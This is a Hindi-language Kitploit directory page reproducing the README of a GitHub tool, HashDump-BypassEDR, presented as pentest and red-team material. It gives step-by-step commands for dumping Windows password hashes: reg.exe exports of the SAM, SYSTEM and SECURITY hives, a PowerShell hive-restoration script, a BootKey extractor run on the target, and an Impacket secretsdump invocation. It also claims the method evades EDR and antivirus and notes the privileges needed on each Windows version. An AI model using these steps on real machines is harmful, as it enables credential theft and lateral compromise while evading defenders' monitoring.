Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
उपकरण/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

रिपॉजिटरी देखें
2513222 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

HashDump-BypassEDR

1# परियोजना अवलोकन

सिस्टम के व्हाइटलिस्टेड प्रोग्राम Reg.exe के विस्तारित अनुप्रयोग के माध्यम से, एंटीवायरस के इंटरसेप्शन बिंदुओं को चतुराई से बायपास किया गया, और EDR को बायपास करके DumpHash का उद्देश्य प्राप्त किया गया।

वास्तविक परीक्षणों के अनुसार, यह विधि Windows परिवार के सिस्टम पर प्रभावी है, इसे करना कठिन नहीं है, और इसमें व्यावहारिक लड़ाकू मूल्य है।

इस परियोजना के व्यावहारिक लेख:

  • EDR को बायपास करके DumpHash कैसे करें - AabyssZG'Blog
  • EDR को बायपास करके DumpHash कैसे करें - राष्ट्रीय साइबर स्पेस सुरक्षा क्लाउड समुदाय

लेख प्रकाशित होने के बाद, घरेलू और विदेशी समुदायों में यही दृष्टिकोण नहीं मिला; मूल रूप से मैंने सोचा था कि यह दुनिया भर में पहला है। बाद में प्रशंसकों की टिप्पणियों के अनुसार, इस दृष्टिकोण को पहले विदेशों में एक विशेषज्ञ द्वारा साझा किया गया था: Dumping LSA secrets: a story about task decorrelation

इस लेख का सोर्स कोड और Release GitHub पर प्रकाशित किया गया है। साझा करना आसान नहीं है, अच्छा लगे तो एक Star दे दें, बहुत-बहुत धन्यवाद!

2# मुख्य चरण

2.1 चरण 1: reg फ़ाइल निर्यात करें

लक्ष्य मशीन पर निम्न कमांड चलाकर .reg फ़ाइल निर्यात करें

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 चरण 2: स्थानीय मशीन पर बाइनरी पुनर्स्थापित करें

पहले चरण की .reg फ़ाइल को स्थानीय मशीन पर डाउनलोड करें, फिर स्थानीय मशीन पर इस प्रोजेक्ट की RegReduction.ps1 PowerShell स्क्रिप्ट चलाकर बाइनरी फ़ाइलों को पुनर्स्थापित करें

root@kitploit:~
.\RegReduction.ps1

नोट: GitHub से स्क्रिप्ट डाउनलोड करने के बाद एन्कोडिंग डिफ़ॉल्ट रूप से UTF-8 होती है; इसे नोटपैड में ANSI (GB2312) में बदलना आवश्यक है ताकि इसे सही ढंग से चलाया जा सके।

powershell.png

2.3 चरण 3: BootKey प्राप्त करें

लक्ष्य मशीन पर BootKey.exe निष्पादन योग्य प्रोग्राम चलाएँ; इसका सोर्स कोड इस प्रोजेक्ट की BootKey.c फ़ाइल है।

root@kitploit:~
BootKey.exe

BootKey.png

एंटीवायरस बायपास परीक्षण (2026.5.10): www.virustotal.com

Virustotal.png

2.4 चरण 4: secretsdump के माध्यम से Hash प्राप्त करें

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# अनुमति विवरण

इस लेख में कई महत्वपूर्ण ऑपरेशन हैं, लक्ष्य मशीन पर मुख्य चरण केवल दो हैं:

  • reg.exe export कमांड का उपयोग करके महत्वपूर्ण रजिस्ट्री सामग्री निर्यात करें;
  • BootKey.exe का उपयोग करके सिस्टम का BootKey निर्यात करें।

विभिन्न सिस्टमों पर भी परीक्षण किया गया, परिणाम इस प्रकार हैं:

  • वास्तविक परीक्षणों में, Win10, Win11 और Windows Server 2025 वातावरण पर reg.exe export कमांड से रजिस्ट्री निर्यात करने के लिए SYSTEM विशेषाधिकार की आवश्यकता होती है, जबकि Windows Server 2022 और उससे नीचे के वातावरण में reg.exe export कमांड से रजिस्ट्री निर्यात करने के लिए केवल सामान्य व्यवस्थापक विशेषाधिकार की आवश्यकता होती है (SYSTEM विशेषाधिकार की आवश्यकता नहीं है)। यदि reg.exe export कमांड से रजिस्ट्री निर्यात करने के बाद फ़ाइल का आकार केवल 1KB है, तो इसका मतलब है कि विशेषाधिकार अपर्याप्त हैं।
  • वास्तविक परीक्षणों में, BootKey.exe निष्कर्षण प्रोग्राम का उपयोग करके BootKey निर्यात करने के लिए व्यवस्थापक विशेषाधिकार की आवश्यकता नहीं होती है, और परीक्षणों में अधिकांश एंटीवायरस (अब तक मिले सभी एंटीवायरस) इसे ब्लॉक या फ्लैग नहीं करते हैं।

🙏 4# सभी विशेषज्ञों को धन्यवाद

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

टूल डाउनलोड करें